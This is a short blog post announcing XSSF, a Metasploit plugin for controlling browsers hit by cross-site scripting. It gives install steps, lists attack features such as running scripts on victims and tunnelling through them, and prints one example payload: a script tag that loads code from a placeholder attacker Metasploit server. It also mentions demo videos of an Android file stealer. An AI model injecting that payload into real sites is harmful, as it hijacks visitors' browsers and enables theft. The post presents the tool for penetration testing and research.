XSSF is an amazing framework developed for be used into Mestasploit Framework, what allow you manage victims of a generic XSS attack and hold an already existing connection in order to allow future attacks.
The Cross-Site Scripting Framework (XSSF) is a security
tool designed to turn the XSS vulnerability exploitation task into a
much easier work. The XSSF project aims to demonstrate the real dangers
of XSS vulnerabilities, vulgarizing their exploitation. This project is
created solely for education, penetration testing and lawful research
purposes. [by XSSF at GoogleCode]
Quick Installation
After you install it into MSF (directory where you have MSF installed), you load XSSF like this:
After you install it into MSF (directory where you have MSF installed), you load XSSF like this:
Typical MSF folfer: /opt/metasploit/msf
$> wget http://dev.metasploit.com/redmine/attachments/596/XSSF.zip
$> unzip XSSF.zip
Copying all files (XSSF.zip) into his corresponding folder: data/ lib/ modules/ plugins/
$> msfconsole
$> load XSSF
New commands are available:
- Simple Script/HTML execution (XSSF auxiliary modules) on targeted victim or group of victims
- MSF Exploit execution on targeted victim
- XSS Tunnel with targeted victim
Example of XSS Attack:
<script src=”http://IP_Server-MSF:Listen-Port/loop?interval=5”></script>
UPDATE (04/10/2011)
I received an advice through twitter by user @X0x1RG9f, who gave me the correct URL of XSSF Maintained Version.Demonstration videos
Now, you can view amazing Videos showing how XSSF works:
1.XSSF Android file stealer
2. Launching MSF exploit through XSSF (CVE-2010-2568)
Download
Fuente: XSSF to Metasploit Framework | XSSF Google Code Project
For Spanish reader I recommend the following article "Exploiting with XSSF" [Spanish language] or this other "XSSF+Metasploit+Ubuntu 11.04" [Spanish language]
0 comentarios:
Publicar un comentario